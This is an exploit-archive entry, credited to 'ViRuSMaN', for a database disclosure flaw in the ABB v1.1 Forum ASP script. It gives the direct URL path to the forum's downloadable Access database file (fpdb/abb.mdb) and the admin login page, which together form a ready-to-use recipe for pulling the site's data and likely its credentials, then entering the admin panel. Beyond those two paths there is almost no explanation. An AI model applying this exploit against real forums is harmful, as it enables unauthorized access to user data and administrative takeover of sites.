id: 10649
date: 01/10/2010
title: ABB v1.1 Forum Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

=======================================================
ABB v1.1 Forum Remote Database Disclosure Vulnerability
=======================================================


[»] Script:             [ ABB Forums ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Possede de tres nombreuses options d administration et de configuration ]

###########################################################################
 
===[ Exploit ]===
 
    [»] http://server/[path]/fpdb/abb.mdb
 
 
===[ Admin Login ]===
 
    [»] http://server/[path]/admin.asp
 
 
Author: ViRuSMaN <-



#  0day.today [2023-03-23]  #